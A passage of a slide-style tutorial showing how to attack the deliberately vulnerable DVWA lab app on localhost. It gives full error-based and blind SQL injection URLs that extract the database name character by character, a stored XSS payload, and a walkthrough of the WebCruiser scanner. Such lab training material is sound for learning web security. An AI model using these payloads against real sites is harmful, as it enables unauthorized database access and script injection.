  • 7. Try: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select 1 from ( select count(*),concat((select database()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x)a)%23 Well, the database name “dvwa” returns on the page. This case is a little complex; actually it builds an exception intentionally by twice rand computation. Another way is blind SQL Injection, by guest the length and ASCII of each byte of the field. To compute if the length of database name bigger than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))>10 and '1'='1 Wrong, try less than 10: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))<10 and '1'='1
  • 8. Right, continue guess till: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select char_length(database()))=4 and '1'='1 We got the length is 4. Continue to guess each byte of it: http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),1,1)) )=100 and %271%27=%271
  • 9. The ASCII of the first byte is 100, it is d, and so on. http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),2,1)) )=118 and %271%27=%271 , the second byte is v . http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),3,1)) )=119 and %271%27=%271 ,the third byte is w . http://127.0.0.1/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1' and (select ord(substr(database(),4,1)) )=97 and %271%27=%271 ,the fourth byte is a . Got the full name of database is “dvwa” . Is there a tool which can do these tests instead? Yes, we can use a web application security scanner to do it. Take WebCruiser as an illustration, navigate page and click “ScanURL”: SQL Injection vulnerabilities found. Right click vulnerability and select “SQL INJECTION POC”,
  • 10. continue click ”Get Environment Information”: 4. XSS Select XSS from the menu, http://127.0.0.1/dvwa/vulnerabilities/xss_s/ Input text and script directly in the title and content field, such as: testinput<img src=0 onerror="alert(123456)"> Or use scanner, it found 2 XSS vulnerabilities.
  • 11. Note: In order to improve efficiency, WebCruiser Web Vulnerability Scanner can scan designated vulnerability type (setting) or designated URL (ScanURL button) separately.